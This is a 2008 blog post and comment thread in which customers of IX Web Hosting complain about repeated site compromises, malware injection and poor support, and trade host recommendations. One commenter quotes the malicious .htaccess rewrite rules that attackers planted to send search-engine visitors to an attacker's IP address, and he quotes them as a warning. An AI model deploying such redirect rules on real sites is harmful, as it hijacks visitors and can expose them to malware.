IX Web Hosting Hacked

Posted: December 10, 2008 in IX Web Hosting
Tags: , , , , , , ,

ixhacked

IX Web Hosting has been  continuously hacked since April of 2008. Thousands of innocent paying customers are furious because of the way IX web hosting has handled the situation.
It has been a well known fact that hackers have seeded and are using IX web hostings servers to inject various scripts into every file on the vunerable server, infecting 1000’s of sites.

I myself had 7 personal  business accounts ( about 60 sites) with IX webhosting, I had them for 4 years, the first 3 years was plain sailing, I was happy with the service provided, and apart from the everyday minor hiccups, things went as they should have.
The trouble started this year 2008 when IX moved all their servers to a new location.

The sheer hosting hell that followed will be posted in the coming days / weeks / months / years

I will be posting links to other topics, printscreen images of support tickets, Emails between myself and IX web hosting, and links for innocent duped customers to file complaints against ixwebhosting.  

Please leave genuine feedback about your experience  with IX web hosting.

Advertisements
Comments
  1. Duf says:

    Those lying motherf’rs. Maybe someone could have clued in their Ukraine based help support personnel of the issues instead of telling them to blame thier customers. Assholes.

    http://duf.net/wp/?p=2121

  2. Alex says:

    Beware for your site being hacked and .htaccess file change to redirect only search engines. Normal users don’t see a difference.

    How IX web claim a 99.9% hack free system is beyond me as I see from numerous blogs this is a common problem

    My site was hacked and .htaccess changed to

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://89.28.13.205/go.php?s=uu1 [R,L]

    As this redirects all search engines to the hackers site
    http://89.28.13.205/go.php?s=uu1 (http://uptodate-protection.com) your site will clearly stop featuring in all search engines.

  3. supert3d says:

    Cautionary tale, there may be other ways of ‘getting in’ to your site. The majority of open source applications on the market (osCommerce, PHPBB, WordPress to name a few ) all use TinyMCE as a WSIWYG editor in the administrative areas of their applications.

    A TinyMCE hack allows you to inject encoded PHP script and infect every file on that domain.

    I reported it some while ago.
    http://techblog.tonycollings.com/?p=39

  4. Matt says:

    I too have had my web site hacked. I had several sites with the. One in particular only used static HTML with one contact us form (PHP). We had site monitoring services (HakerSafe). When we called to report that the server was hacked they played it off like it was our fault. What a punch of crap. The form submission only sent email and it was an in-house script that was extremely secure (have a good friend who does computer SA check our coding).

    Interesting how other accounts I had what were on the same server were also hacked. Each site was different in nature with different code. No public scripts. The same run around was given for all of them. Changed to a dedicated server, used the same code, and no hacking of my site since.

    IX Webhosting blows!

  5. Mike D says:

    Just got hacked and using ixwebhosting. My content was picked up by google as some other URL that is now dead. I’m switching hosting companies ASAP.

  6. Thanks for this web warning, I’ve cancelled my IX account.

  7. James says:

    My website got hacked and replaced with something that spewed out viruses, I have just cancelled my account and switched over my domains to another registrar because I don’t even trust them for that.

  8. Crystal says:

    I switched back in January because my sites kept being hacked since August of 08. What a shame they still haven’t corrected it. Thank goodness I switched. My clients were losing money!
    IX does suck!

  9. Ben says:

    I manage my mothers site (or used to since she doesn’t update anymore) and just last month a local visitor told me that the site gave them a virus. Thinking that was incorrect I went to the site myself and sure enough my comptuer went down (about instantly) with a virus that locked out all controls and resulted in my having to format. I contacted IX about the problem and they said that someone probably stole my FTP password, but after reading these posts I’m not sure I can trust that…I guess we’ll see if it happens again

  10. Arnold says:

    My site was hacked twice in Sept 2009. Malicious javascript was injected into nearly every html file on my site. The script would load virus-laden files onto anyone who viewed my site, unless they were lucky enough to be protected by a good anti-virus application.

    By viewing logs, I determined that my site had been hacked via FTP from hackers in Russia, Turkey, and Ukraine.

    IX told me I should install http://ftp.allow and http://ftp.deny files in my root folder and that I should utilize secure FTP connections. They also suggested that maybe a virus was already on my computer that allowed the hackers to acquire my FTP account info, but I know that’s not true.

  11. Vivo says:

    Just got hacked on IX yesterday, and my 10 sites all started spewing some malware at any visitor coming through Google. I believe the trojan was something called SmitFraud, which would use some nasty script in a PDF file to infect the innocent visitor’s PC and redirect them to some fake anti-virus website in Russia.

    I was also hacked last November, but this time around it wasn’t the htaccess hack. Instead, there was some rogue javascript embedded into every page just above the “/html” tag.

    I got the usual run-around from IX about changing my password, making it more secure, etc. but this is clearly a problem on IX’s own end.

    Terrible! Time to switch…

  12. Di says:

    We have been fighting with IX all summer and find outselves chasing around, reloading index’s, changing passwords every time we go into the directories and again when we log out of the directories.

    It’s obvious from reading the comments here that we are not alone and it is definitely time to move the site if we want to continue it at all. We’re just a small fan website with no commercial or retail but we do have a phbbb message board for all of us to keep in touch.

    Has anyone actually found a stable hosting site that you’re happy with? We’ve been with IX for many years but what was set up as a fun venture just isn’t fun anymore due to this. We need a host that we can rely on NOW. We could sure use some suggestions because we don’t even know where to start.

  13. Vivo says:

    I don’t have a lot of experience with them yet, but Host Gator seems to have comparable prices and hosting plans as IX. I’m currently in the process of transferring my sites over to them.

    One thing to note about Host Gator is they have a real 99.9% uptime guarantee, and they are actually accredited with the Better Business Bureau (BBB). IX says they are accredited as well, but the BBB website says otherwise. IX also doesn’t respond to BBB complaints, whereas Host Gator actually takes them seriously and tries to address customer complaint issues.

    I’ll give Host Gator a try for the next few months. I have a hard time believing it can be much worse than this IX crap.

  14. Jeff says:

    We’ve been using & recommending another host for over 10 years! We’ve since ordered our own VPS from them just a couple years ago. This company is very good. Nothing goes wrong there & if we ask for new technologies or help with installing or running our own open source stuff, they’ve actually helped us FREE every time.

    I’m sad to see so many disappointments from ix. I was going to try them for a heavy e-commerce site back in 2000, but so glad I didn’t.

    The company is hostforweb. They are not well known, but they are great. It’s the closest thing I’ve seen to my old rackspace account. With rackspace.com being too expensive, I’m even happier that I found this host. If you can, please use my referral link to help me out.

    http://billing.hostforweb.com/aff.php?aff=216

  15. ixwebhosting has huge problems, does anyone know of a site hosting company without this vulnurability and similar ‘multi-domain’ hosting… i havent found another hosting company that puts each add-on domain in its own folder so its url goes ot its prime location, rather than a subfolder/subdomain of your original url

  16. Abdelkader Maged says:

    Well, if you need a good hosting website that have been a very good hosting company with the best Control Panel I have ever used before, and for real hackproof , then give a try http://www.servage.net
    It has been the best Hosting company i have dealt with, with unlimited domains and sub domains and the best of ALL – you don’t have to put your website in the root folder of it, you can create any folder you like and with a click you can make any domain you host to make that folder their main folder, or any sub-domain, and you can change them any time to another folder ( as for testing website or so) then changing back to it as much as you want,
    Really the BEST GUYS

  17. PJ Keener says:

    Well I’ve experienced exactly what you are saying. I had to remove base 64 php code malware from every single php file on every single hosted domain I had setup on there….. And today….. well I secured one of the sites that I was led to beleive was the entry point of the hacking…. Well I spent another 3 hours rebuilding the site and got it working perfectly…. just now try to login… F’ing IXWebhosting is totally down, their phones wont even work. Every single site I have is down and who knows for how long…. I last touched it today around 3pm now its midnight and tomorrow I’ll have all my clients calling in bitching they cant get email and their sites are down…. pluss the added fact that ALL OF THE SUPPORT FOR IX IS DOWN….. NOT EVEN THEIR PARENT COMPANY’s phones work! WTF! I’ve Been with these guys for a long ass time….

  18. Sean says:

    I was registered with IX back in 2005, from then I had no errors/troubles, but their customer support lacked some ‘logic sense’. I once asked them to move a 877 MB file to another folder through LiveChat, rather than the Supporter moving the folder in a *second* he actually told to open a ticket and tell them my problem and moving the folder… I paused all my work for 2 days till they moved that big ass file. And sometime the servers becomes really slow (perhaps a dDos) and I receive many SQL Database errors to my email regarding few forums that I host.

    Nevertheless, I didn’t got ‘hacked’ or anything, I always update my PHP security, check the new PHP holes, and stuff… They got their bad time and good time. 😉

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s